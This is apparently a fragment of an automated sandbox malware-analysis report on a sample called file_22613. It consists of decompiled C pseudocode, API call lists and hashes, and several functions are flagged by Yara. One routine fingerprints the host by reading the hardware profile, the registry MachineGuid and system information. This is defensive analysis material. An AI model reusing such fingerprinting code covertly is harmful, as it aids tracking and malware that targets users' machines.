                                                                                control_flow_graph 687 403f24-403f3e call 4219a8 690 403f40-403f43 687->690 691 403f45-403f5c 687->691 692 403f6c-403f76 call 40406b 690->692 691->692 693 403f5e-403f67 691->693 696 403f7b-403fae 692->696 693->692 694 403f69 693->694 694->692 698 403fb0-403fb4 696->698 699 403fc9-403fe2 call 402c34 696->699 701 403fb6-403fb8 698->701 702 403fba 698->702 705 403fe4 699->705 706 403fe6-403fef call 421a4d 699->706 704 403fbc-403fc6 call 421230 701->704 702->704 704->699 705->706
                                                                                C-Code - Quality: 93%
                                                                                			E00403F24(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				signed int _t30;
                                                                                				signed int _t32;
                                                                                				signed int _t34;
                                                                                				signed int _t39;
                                                                                				intOrPtr _t40;
                                                                                				unsigned int _t42;
                                                                                				unsigned int _t48;
                                                                                				signed int _t51;
                                                                                				signed int _t53;
                                                                                				void* _t54;
                                                                                
                                                                                				_push(0xc);
                                                                                				E004219A8(E00435C78, __ebx, __edi, __esi);
                                                                                				_t53 = __ecx;
                                                                                				 *((intOrPtr*)(_t54 - 0x18)) = __ecx;
                                                                                				_t51 =  *(_t54 + 8) | 0x0000000f;
                                                                                				if(_t51 <= 0xfffffffe) {
                                                                                					_t39 = 3;
                                                                                					_t42 =  *(__ecx + 0x14);
                                                                                					 *(_t54 - 0x14) = _t42;
                                                                                					 *(_t54 - 0x14) =  *(_t54 - 0x14) >> 1;
                                                                                					_t48 =  *(_t54 - 0x14);
                                                                                					if(_t48 > _t51 / _t39) {
                                                                                						_t51 = 0xfffffffe;
                                                                                						if(_t42 <= _t51 - _t48) {
                                                                                							_t51 = _t48 + _t42;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					_t51 =  *(_t54 + 8);
                                                                                				}
                                                                                				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
                                                                                				_t16 = _t51 + 1; // 0xff
                                                                                				_push(0);
                                                                                				_t30 = E0040406B(_t51, _t53, _t16); // executed
                                                                                				 *(_t54 + 8) = _t30;
                                                                                				_t40 =  *((intOrPtr*)(_t54 + 0xc));
                                                                                				if(_t40 != 0) {
                                                                                					if( *(_t53 + 0x14) < 0x10) {
                                                                                						_t34 = _t53;
                                                                                					} else {
                                                                                						_t34 =  *_t53;
                                                                                					}
                                                                                					E00421230( *(_t54 + 8), _t34, _t40);
                                                                                				}
                                                                                				E00402C34(_t53, 1, 0);
                                                                                				_t32 =  *(_t54 + 8);
                                                                                				 *_t53 = _t32;
                                                                                				 *(_t53 + 0x14) = _t51;
                                                                                				 *((intOrPtr*)(_t53 + 0x10)) = _t40;
                                                                                				if(_t51 < 0x10) {
                                                                                					_t32 = _t53;
                                                                                				}
                                                                                				 *((char*)(_t32 + _t40)) = 0;
                                                                                				return E00421A4D(_t32);
                                                                                			}














                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3_catch_memmove
                                                                                • String ID:
                                                                                • API String ID: 3914490576-0
                                                                                • Opcode ID: bcd812267cdec8370236befbb77559b440871960d1f1a928b07e98a58a7e672f
                                                                                • Instruction ID: 8a178f20502620d6e08465528b5dfc8f4163f6dc24cd2f819fa24208c9268523
                                                                                • Opcode Fuzzy Hash: bcd812267cdec8370236befbb77559b440871960d1f1a928b07e98a58a7e672f
                                                                                • Instruction Fuzzy Hash: 1411E171F042069BEB24DF28D84072EBBBAAB94711F20452FF445BB3C1C7B4AA408799
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 711 414ea2-414edb call 41eb16 714 414ef2 711->714 715 414edd call 41d9c9 711->715 716 414ef4-414f0f call 414fcb 714->716 719 414ee2-414ef0 call 41d788 call 40f13e 715->719 723 414f11-414f16 call 4143b2 716->723 724 414f1b-414f1d 716->724 719->716 723->724
                                                                                C-Code - Quality: 88%
                                                                                			E00414EA2(void* __esi, void* __ebp, void* __eflags, intOrPtr _a8) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				char _t20;
                                                                                				intOrPtr _t22;
                                                                                				void* _t25;
                                                                                				intOrPtr* _t26;
                                                                                				void* _t29;
                                                                                				void* _t31;
                                                                                
                                                                                				_t31 = __esi;
                                                                                				 *((intOrPtr*)(__esi + 0x30)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 8)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x10)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x14)) = 0x201;
                                                                                				 *((intOrPtr*)(__esi + 0x18)) = 6;
                                                                                				 *((intOrPtr*)(__esi + 0x1c)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x20)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x24)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x28)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                                                				 *((intOrPtr*)(__esi + 0xc)) = 0;
                                                                                				_t26 = E0041EB16(_t25, _t29, 0, __esi, __eflags, 4);
                                                                                				_pop(_t27);
                                                                                				_t34 = _t26;
                                                                                				if(_t26 == 0) {
                                                                                					_t26 = 0;
                                                                                					__eflags = 0;
                                                                                				} else {
                                                                                					_t22 = E0041D9C9(_t26, 0, __esi, _t34); // executed
                                                                                					 *_t26 = _t22;
                                                                                					_t27 = E0041D788();
                                                                                					E0040F13E(_t23);
                                                                                				}
                                                                                				_push(0x20);
                                                                                				_push(_t31);
                                                                                				 *((intOrPtr*)(_t31 + 0x30)) = _t26;
                                                                                				 *((intOrPtr*)(_t31 + 0x38)) = _a8;
                                                                                				 *((intOrPtr*)(_t31 + 0x3c)) = 0;
                                                                                				_t20 = E00414FCB(_t26, _t27, 0, _t31, _t34);
                                                                                				 *((char*)(_t31 + 0x40)) = _t20;
                                                                                				if( *((intOrPtr*)(_t31 + 0x38)) == 0) {
                                                                                					return E004143B2(4, 0);
                                                                                				}
                                                                                				return _t20;
                                                                                			}












                                                                                APIs
                                                                                  • Part of subcall function 0041EB16: _malloc.LIBCMT ref: 0041EB30
                                                                                • std::locale::_Init.LIBCPMT ref: 00414EDD
                                                                                  • Part of subcall function 0041D9C9: __EH_prolog3.LIBCMT ref: 0041D9D0
                                                                                  • Part of subcall function 0041D9C9: std::_Lockit::_Lockit.LIBCPMT ref: 0041D9E6
                                                                                  • Part of subcall function 0041D9C9: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0041DA08
                                                                                  • Part of subcall function 0041D9C9: std::locale::_Setgloballocale.LIBCPMT ref: 0041DA12
                                                                                  • Part of subcall function 0041D9C9: _Yarn.LIBCPMT ref: 0041DA28
                                                                                  • Part of subcall function 0041D9C9: std::locale::facet::_Incref.LIBCPMT ref: 0041DA35
                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 00414EEB
                                                                                  • Part of subcall function 0040F13E: std::_Lockit::_Lockit.LIBCPMT ref: 0040F14A
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::locale::_$IncrefLockitLockit::_std::_std::locale::facet::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn_malloc
                                                                                • String ID:
                                                                                • API String ID: 3761783024-0
                                                                                • Opcode ID: 2814a1ef4c0dff3bb9b9631679d8e90038e36d2f9e4ee7de47969a0cd22b2b8b
                                                                                • Instruction ID: 36576c7fc89020b0ecd9f1e70a3733df5921522e4f5e67ad96fb27b335124f54
                                                                                • Opcode Fuzzy Hash: 2814a1ef4c0dff3bb9b9631679d8e90038e36d2f9e4ee7de47969a0cd22b2b8b
                                                                                • Instruction Fuzzy Hash: B3010CB0A00B009FC3309F6B918565BFAF8BFD4714B104A2FE28686E51D7B9A4858B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 728 40406b-404076 729 4040b0-4040b1 728->729 730 404078-40407c 728->730 731 40408b-4040ab call 41e15e call 421126 730->731 732 40407e-404081 call 41eb16 730->732 731->729 735 404086-404089 732->735 735->729 735->731
                                                                                C-Code - Quality: 58%
                                                                                			E0040406B(void* __edi, void* __esi, signed int _a4) {
                                                                                				char _v16;
                                                                                				void* _t10;
                                                                                				void* _t15;
                                                                                				void* _t18;
                                                                                
                                                                                				_t10 = 0;
                                                                                				if(_a4 > 0) {
                                                                                					_t24 = _a4 - 0xffffffff;
                                                                                					if(_a4 > 0xffffffff) {
                                                                                						L3:
                                                                                						_a4 = _a4 & 0x00000000;
                                                                                						E0041E15E( &_v16,  &_a4);
                                                                                						_v16 = 0x43834c;
                                                                                						return E00421126( &_v16, 0x4441e0);
                                                                                					}
                                                                                					_t10 = E0041EB16(_t15, _t18, __edi, __esi, _t24, _a4); // executed
                                                                                					if(0 == 0) {
                                                                                						goto L3;
                                                                                					}
                                                                                				}
                                                                                				return _t10;
                                                                                			}








                                                                                APIs
                                                                                • std::exception::exception.LIBCMT ref: 00404096
                                                                                • __CxxThrowException@8.LIBCMT ref: 004040AB
                                                                                  • Part of subcall function 0041EB16: _malloc.LIBCMT ref: 0041EB30
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 4063778783-0
                                                                                • Opcode ID: 229ca0dfbd837ccbfc73e429b95277c81b705108bb3430ffb820af9b12988eee
                                                                                • Instruction ID: db3c686d204560470709e76104daf21eafb2fff72d3bc04e1d1d98e8c19dfb25
                                                                                • Opcode Fuzzy Hash: 229ca0dfbd837ccbfc73e429b95277c81b705108bb3430ffb820af9b12988eee
                                                                                • Instruction Fuzzy Hash: FDE06574900209AADF10EF71D841ACE7BBC9B003A8F10C23BFE14A52C1DB78D6848A99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 89%
                                                                                			E0041551F(intOrPtr __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* __ebp;
                                                                                				signed int _t24;
                                                                                				void* _t29;
                                                                                				void* _t30;
                                                                                				void* _t31;
                                                                                				void* _t34;
                                                                                				intOrPtr _t44;
                                                                                				void* _t45;
                                                                                				intOrPtr _t56;
                                                                                				intOrPtr _t64;
                                                                                				intOrPtr _t73;
                                                                                				signed int _t74;
                                                                                				void* _t76;
                                                                                
                                                                                				_t56 = __edx;
                                                                                				_t45 = __ecx;
                                                                                				_t74 = _t76 - 0x88;
                                                                                				_t24 =  *0x447674; // 0x4124c941
                                                                                				 *(_t74 + 0x8c) = _t24 ^ _t74;
                                                                                				E00421975(E004365E6, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t74 - 0x10)) = 0;
                                                                                				 *((intOrPtr*)(__ebx + 0x14)) = 0xf;
                                                                                				 *((intOrPtr*)(__ebx + 0x10)) = 0;
                                                                                				 *((intOrPtr*)(_t74 - 0x14)) = __ebx;
                                                                                				 *((char*)(__ebx)) = 0;
                                                                                				 *((intOrPtr*)(_t74 - 4)) = 0;
                                                                                				 *((intOrPtr*)(_t74 - 0x10)) = 1;
                                                                                				_t29 = E00415C16(1, _t74 + 0x1c); // executed
                                                                                				 *((intOrPtr*)(_t74 - 4)) = 1;
                                                                                				_t30 = E0040C689(_t45, _t74, _t29, 0x14, 0x11);
                                                                                				 *((char*)(_t74 - 4)) = 2;
                                                                                				_t31 = E00415C6D(_t30, _t74 + 0x38);
                                                                                				 *((char*)(_t74 - 4)) = 3;
                                                                                				E0040C689(_t45, _t74 + 0x70, _t31, 0, 0x18);
                                                                                				 *((char*)(_t74 - 4)) = 4;
                                                                                				_t34 = E0040D431(_t30, _t74 + 0x54);
                                                                                				 *((char*)(_t74 - 4)) = 5;
                                                                                				E0040CFB8(__ebx, _t34);
                                                                                				E00402C34(_t74 + 0x54, 1, 0);
                                                                                				E00402C34(_t74 + 0x70, 1, 0);
                                                                                				E00402C34(_t74 + 0x38, 1, 0);
                                                                                				E00402C34(_t74, 1, 0);
                                                                                				E00402C34(_t74 + 0x1c, 1, 0);
                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t74 - 0xc));
                                                                                				_t64 = 8;
                                                                                				_pop(_t73);
                                                                                				_pop(_t44);
                                                                                				return E0041DEB4(__ebx, _t44,  *(_t74 + 0x8c) ^ _t74, _t56, _t64, _t73);
                                                                                			}

















                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 0041553E
                                                                                  • Part of subcall function 00415C16: GetCurrentHwProfileA.ADVAPI32(?), ref: 00415C36
                                                                                  • Part of subcall function 00415C6D: _memset.LIBCMT ref: 00415CA8
                                                                                  • Part of subcall function 00415C6D: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00415CC4
                                                                                  • Part of subcall function 00415C6D: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?,?,?,?), ref: 00415CE3
                                                                                  • Part of subcall function 00415C6D: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00415CEC
                                                                                  • Part of subcall function 00415C6D: CharToOemA.USER32(?,?), ref: 00415CFD
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove$CharCloseCurrentH_prolog3OpenProfileQueryValue_memset
                                                                                • String ID:
                                                                                • API String ID: 577691565-0
                                                                                • Opcode ID: 5fb9192717c7d80a9e6b2954902b3fde48ad56a2556d0363fffb32aaa6829de8
                                                                                • Instruction ID: e5420425b49f5e71cfc94671cbb469105b6df6a91cd3b079332353f26e2a2dbc
                                                                                • Opcode Fuzzy Hash: 5fb9192717c7d80a9e6b2954902b3fde48ad56a2556d0363fffb32aaa6829de8
                                                                                • Instruction Fuzzy Hash: D521CE72901258EADB24EF66DD41BDF7BB4AF95304F00402EBC05A72C2DA785B09C7A4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E00417463(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t42;
                                                                                				intOrPtr _t56;
                                                                                				void* _t59;
                                                                                
                                                                                				_t57 = __esi;
                                                                                				_t51 = __ecx;
                                                                                				_push(0xd8);
                                                                                				E004219DE(E004370C7, __ebx, __edi, __esi);
                                                                                				_t56 = __ecx;
                                                                                				 *((intOrPtr*)(_t59 - 0x30)) = 0;
                                                                                				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
                                                                                				 *((intOrPtr*)(__ecx + 0x10)) = 0;
                                                                                				 *((intOrPtr*)(_t59 - 0x34)) = __ecx;
                                                                                				 *((char*)(__ecx)) = 0;
                                                                                				 *((intOrPtr*)(_t59 - 0xe0)) = 0x4425c8;
                                                                                				 *((intOrPtr*)(_t59 - 0xd0)) = 0x442704;
                                                                                				 *((intOrPtr*)(_t59 - 0x80)) = 0x441158;
                                                                                				_push(_t59 - 0xc8);
                                                                                				 *((intOrPtr*)(_t59 - 4)) = 1;
                                                                                				_push(_t59 - 0xe0);
                                                                                				 *((intOrPtr*)(_t59 - 0x30)) = 3;
                                                                                				E004169F3(__esi, 0); // executed
                                                                                				 *((intOrPtr*)(_t59 - 4)) = 2;
                                                                                				_t14 =  *((intOrPtr*)(_t59 - 0xe0)) + 4; // 0x60
                                                                                				 *((intOrPtr*)(_t59 +  *_t14 - 0xe0)) = 0x4411fc;
                                                                                				E00414F20(0, __ecx, __esi, 0, _t59 - 0xc8);
                                                                                				 *((intOrPtr*)(_t59 - 0xc8)) = 0x4411bc;
                                                                                				 *((intOrPtr*)(_t59 - 0x8c)) = 0;
                                                                                				 *((intOrPtr*)(_t59 - 0x88)) = 0;
                                                                                				 *((intOrPtr*)(_t59 - 4)) = 4;
                                                                                				E00417DA6(0, _t51, _t56, _t57, 0, _t59 - 0xd0,  *((intOrPtr*)(_t59 + 8)));
                                                                                				_t42 = E0040C982(_t59 - 0xe0, _t59 - 0x2c);
                                                                                				 *((char*)(_t59 - 4)) = 5;
                                                                                				E0040CFB8(_t56, _t42);
                                                                                				E00402C34(_t59 - 0x2c, 1, 0);
                                                                                				 *((char*)(_t59 - 4)) = 0;
                                                                                				E0040B593(_t59 - 0xe0, 0, _t56);
                                                                                				return E00421A61(0, _t56, _t42);
                                                                                			}







                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0041746D
                                                                                  • Part of subcall function 004169F3: __EH_prolog3.LIBCMT ref: 004169FA
                                                                                  • Part of subcall function 00414F20: __EH_prolog3.LIBCMT ref: 00414F27
                                                                                  • Part of subcall function 00414F20: std::_Mutex::_Mutex.LIBCPMT ref: 00414F38
                                                                                  • Part of subcall function 00414F20: std::locale::_Init.LIBCPMT ref: 00414F4F
                                                                                  • Part of subcall function 00414F20: std::locale::facet::_Incref.LIBCPMT ref: 00414F5D
                                                                                  • Part of subcall function 00417DA6: __EH_prolog3_catch.LIBCMT ref: 00417DAD
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                  • Part of subcall function 0040B593: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040B5A5
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3_memmove$H_prolog3_H_prolog3_catchIncrefInitIos_base_dtorMutexMutex::_std::_std::ios_base::_std::locale::_std::locale::facet::_
                                                                                • String ID:
                                                                                • API String ID: 3326898877-0
                                                                                • Opcode ID: 1ab3d58aa075648dfd068472587dd9e940e1caeabe0c2d4bf56d633abaa55544
                                                                                • Instruction ID: 3c1c28bed4adb165aa5ba628e1cee47c92275fc053e28587ff6ea9a4e784ed42
                                                                                • Opcode Fuzzy Hash: 1ab3d58aa075648dfd068472587dd9e940e1caeabe0c2d4bf56d633abaa55544
                                                                                • Instruction Fuzzy Hash: 1F21FCB1801259DEDB10DF95D885BCDBBB8BF14308F5085EFE108B7241C7B85A888F58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E00427EAA(signed int _a4, signed int _a8, long _a12) {
                                                                                				void* _t10;
                                                                                				long _t11;
                                                                                				long _t12;
                                                                                				signed int _t13;
                                                                                				signed int _t17;
                                                                                				long _t19;
                                                                                				long _t24;
                                                                                
                                                                                				_t17 = _a4;
                                                                                				if(_t17 == 0) {
                                                                                					L3:
                                                                                					_t24 = _t17 * _a8;
                                                                                					__eflags = _t24;
                                                                                					if(_t24 == 0) {
                                                                                						_t24 = _t24 + 1;
                                                                                						__eflags = _t24;
                                                                                					}
                                                                                					goto L5;
                                                                                					L6:
                                                                                					_t10 = RtlAllocateHeap( *0x449158, 8, _t24); // executed
                                                                                					__eflags = 0;
                                                                                					if(0 == 0) {
                                                                                						goto L7;
                                                                                					}
                                                                                					L14:
                                                                                					return _t10;
                                                                                					goto L15;
                                                                                					L7:
                                                                                					__eflags =  *0x44978c;
                                                                                					if( *0x44978c == 0) {
                                                                                						_t19 = _a12;
                                                                                						__eflags = _t19;
                                                                                						if(_t19 != 0) {
                                                                                							 *_t19 = 0xc;
                                                                                						}
                                                                                					} else {
                                                                                						_t11 = E0042482A(_t10, _t24);
                                                                                						__eflags = _t11;
                                                                                						if(_t11 != 0) {
                                                                                							L5:
                                                                                							_t10 = 0;
                                                                                							__eflags = _t24 - 0xffffffe0;
                                                                                							if(_t24 > 0xffffffe0) {
                                                                                								goto L7;
                                                                                							} else {
                                                                                								goto L6;
                                                                                							}
                                                                                						} else {
                                                                                							_t12 = _a12;
                                                                                							__eflags = _t12;
                                                                                							if(_t12 != 0) {
                                                                                								 *_t12 = 0xc;
                                                                                							}
                                                                                							_t10 = 0;
                                                                                						}
                                                                                					}
                                                                                					goto L14;
                                                                                				} else {
                                                                                					_t13 = 0xffffffe0;
                                                                                					_t27 = _t13 / _t17 - _a8;
                                                                                					if(_t13 / _t17 >= _a8) {
                                                                                						goto L3;
                                                                                					} else {
                                                                                						 *((intOrPtr*)(E00423E5B(_t27))) = 0xc;
                                                                                						return 0;
                                                                                					}
                                                                                				}
                                                                                				L15:
                                                                                			}











                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00423055,?,?,00000000,00000000,00000000,?,00427B18,00000001,00000214), ref: 00427EED
                                                                                  • Part of subcall function 00423E5B: __getptd_noexit.LIBCMT ref: 00423E5B
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap__getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 328603210-0
                                                                                • Opcode ID: e7e8d367f46f83816ea8076d3e9d5c27fb6f63afcbdaef76b2a240d3f09669d6
                                                                                • Instruction ID: 89d001067ae943950055174a336def3ab18d9b67e45a2f5168d8cf5bbdb92ca5
                                                                                • Opcode Fuzzy Hash: e7e8d367f46f83816ea8076d3e9d5c27fb6f63afcbdaef76b2a240d3f09669d6
                                                                                • Instruction Fuzzy Hash: 5701D8313092369AEB24DF26FC04B6B3758AF81761F43896BF815D7290DB38CC008758
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 00C74004
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHeap
                                                                                • String ID:
                                                                                • API String ID: 10892065-0
                                                                                • Opcode ID: 04cd5df9f55645ed520e5bc8e52ff40184ad62a185527cc972710299f336aa81
                                                                                • Instruction ID: 93e710b84dd4ff5f04086c58dff0e23b88f9a6169f332405debc03c0a43257b7
                                                                                • Opcode Fuzzy Hash: 04cd5df9f55645ed520e5bc8e52ff40184ad62a185527cc972710299f336aa81
                                                                                • Instruction Fuzzy Hash: 68D05E32550344AAEB105FB5AC087663BDCE385395F048436F95DC6250E674C541DA10
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E004169F3(void* __esi, void* __eflags) {
                                                                                				void* _t20;
                                                                                				void* _t21;
                                                                                				intOrPtr* _t23;
                                                                                				void* _t24;
                                                                                
                                                                                				_push(4);
                                                                                				E00421975(E00436CB2, _t20, _t21, __esi);
                                                                                				_t23 =  *((intOrPtr*)(_t24 + 8));
                                                                                				 *(_t24 - 0x10) =  *(_t24 - 0x10) & 0x00000000;
                                                                                				E00414C17(_t20, _t21, _t23,  *(_t24 - 0x10), _t23,  *((intOrPtr*)(_t24 + 0xc))); // executed
                                                                                				 *((intOrPtr*)(_t23 +  *((intOrPtr*)( *((intOrPtr*)(_t23 + 0x10)) + 4)) + 0x10)) = 0x4411ac;
                                                                                				 *((intOrPtr*)(_t23 +  *((intOrPtr*)( *_t23 + 4)))) = 0x4411b4;
                                                                                				return E00421A4D(_t23);
                                                                                			}








                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 004169FA
                                                                                  • Part of subcall function 00414C17: __EH_prolog3.LIBCMT ref: 00414C1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3
                                                                                • String ID:
                                                                                • API String ID: 431132790-0
                                                                                • Opcode ID: efa3bb3c7bd80237d80622d9fb70ae7e8516c41f69546cc5badce409429bc3f1
                                                                                • Instruction ID: a93c9d1a518b0919b242d818ac543b0d2d28a65533779c7c75178345d5b45e48
                                                                                • Opcode Fuzzy Hash: efa3bb3c7bd80237d80622d9fb70ae7e8516c41f69546cc5badce409429bc3f1
                                                                                • Instruction Fuzzy Hash: 87E01A742006109BD721DF04C801E59B7E4BF19304F41C54AFA805B321C378E940CB9C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00415610(intOrPtr _a4) {
                                                                                				signed int _v8;
                                                                                				struct _SYSTEM_INFO _v44;
                                                                                				void* __ebp;
                                                                                				void* _t10;
                                                                                				void* _t12;
                                                                                				void* _t13;
                                                                                				void* _t14;
                                                                                
                                                                                				_t1 =  &_v8;
                                                                                				_v8 = _v8 & 0x00000000;
                                                                                				GetSystemInfo( &_v44); // executed
                                                                                				E00417463(_t10, _a4, _t12, _t13, _t14,  *_t1, _v44.dwNumberOfProcessors); // executed
                                                                                				return _a4;
                                                                                			}











                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,4124C941), ref: 0041561E
                                                                                  • Part of subcall function 00417463: __EH_prolog3_GS.LIBCMT ref: 0041746D
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
